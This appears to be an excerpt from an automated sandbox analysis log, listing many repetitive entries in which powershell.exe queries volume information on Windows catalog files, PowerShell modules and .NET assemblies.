Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
